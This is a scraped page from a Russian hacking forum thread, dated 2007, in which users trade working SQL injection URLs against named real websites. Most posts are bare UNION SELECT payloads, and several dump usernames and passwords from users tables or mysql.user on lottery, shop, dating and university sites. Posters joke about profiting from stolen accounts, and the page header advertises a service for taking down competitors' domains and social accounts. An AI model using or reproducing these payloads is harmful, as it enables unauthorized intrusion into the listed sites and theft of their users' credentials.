SQL Инъекции

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 111 из 1602

111

Опции темы

Поиск в этой теме

Опции просмотра

19.03.2007, 16:33

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

С нами: 10467686

Репутация: 930

www.0577.ru

Лотерея, довольно неплохие призы, много областей, версия 5, но там походу фильтрация при переборе колонок идет. Кто докопается вышлите мне КПК =)

Код:

http://www.0577.ru/index.php?region_id=-1+union+select+version()+from+mysql.user/*

𝕏 Twitter Reddit Telegram Копировать ссылку

19.03.2007, 17:05

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

С нами: 10686686

Репутация: 447

Цитата:

Сообщение от Ksander

www.0577.ru
Лотерея, довольно неплохие призы, много областей, версия 5, но там походу фильтрация при переборе колонок идет. Кто докопается вышлите мне КПК =)

Код:

http://www.0577.ru/index.php?region_id=-1+union+select+version()+from+mysql.user/*

чето не понятно о какой фильтрации идет речь
http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/*

Последний раз редактировалось }{0TT@БЬ)Ч; 19.03.2007 в 17:08..

19.03.2007, 16:38

~~Aerot1smo~~

Banned

Регистрация: 06.07.2006

Сообщений: 83

С нами: 10445530

Репутация: 26

Цитата:

http://www.weight-watchers.ee/recipe.php?id=-1+union+select+1,2,3,4,5,6,convert(database(),char ),8,9,10,11,12/*

www.weight-watchers.ee

19.03.2007, 16:51

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

С нами: 10467686

Репутация: 930

avtostarter.com

Можно прикупить запчасти =)
На акках довльно крупные скидки 20%+

Код:

http://avtostarter.com//obzor.php?k_id=-1+union+select+concat(login,char(58),pass)+from+users+limit+3,1/*

19.03.2007, 17:16

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

Цитата:

http://sensorweb.mit.edu/principals_a.php?id=-15+union+select+1,concat(user,char(58),password,ch ar(58),host),3,4,5,6,7,8,9,10,11,12,13,14,15+from+ mysql.user

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

19.03.2007, 17:23

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

Код:

http://www.sibdom.ru/help.php?ids=-1+union+select+1,2,concat(user_name,0x3a,user_pass),4,5,6,7+from+users/*

Код:

http://www.riag.ru/index.php?ids=-1+union+select+1,2,version(),4,5,6,7+from+users/*

Код:

http://nskfei.ru/girl.php?ids=-1+union+select+1,user(),3,version(),5,6,7,database()/*

Код:

http://www.zol.ru/review/show.php?ids%5B0%5D=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11+user/*

Код:

http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*

Код:

http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*

19.03.2007, 17:28

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

С нами: 10686686

Репутация: 447

2Spyder

Цитата:

но там походу фильтрация при переборе колонок идет

это не перебор колонок?http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/*

Цитата:

Сообщение от Spyder

}{0TT@БЬ)Ч, гыб а ты попробуй теперь чё нить вывести
вот тебе к примеру
таблица - auth_user
колонки - user_name, user_password

upd:
Spyder вроде статью написал а такие простые вещи не знаешь

http://www.0577.ru/index.php?region_id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user _name,char(58),user_password),0x71),0x71)+from+anu m_new.auth_user+limit+0,1/*

Последний раз редактировалось }{0TT@БЬ)Ч; 19.03.2007 в 17:37..

19.03.2007, 18:03

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

Цитата:

http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,version(),6

судя по версии сервак на винде =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

19.03.2007, 18:17

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

С нами: 10467686

Репутация: 930

Цитата:

Сообщение от Spyder

судя по версии сервак на винде =\

Код:

http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,password,6+from+mysql.user/*

http://www.flirtanica.ru

Код:

http://www.flirtanica.ru./articles1.php?id=-1+union+select+1,version(),3,4,5/*

http://www.gelezo.net

Код:

http://www.gelezo.net/files.php?id=1'+union+select+1,2,3,4,5,version(),7,8,10,11,12,13/*

Кстати, мы всем этим сайтам повышаем популярность, это как каталог бажных сайтов =)

Последний раз редактировалось Ksander; 19.03.2007 в 18:29..

#10

19.03.2007, 18:45

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

С нами: 10483586

Репутация: 5826

Код:

http://www.chita.ru/firms/index.php?page=view&id=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Код:

http://www.foodpages.ru/show_firm.php?id_firm=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(database(),char(58),user(),char(58),version()),12,13/*

Код:

http://vdd.com.ua/Tovaru.php?idr=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

Страница 111 из 1602

111

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.

Внести депозит

Депозит создан

Вывести депозит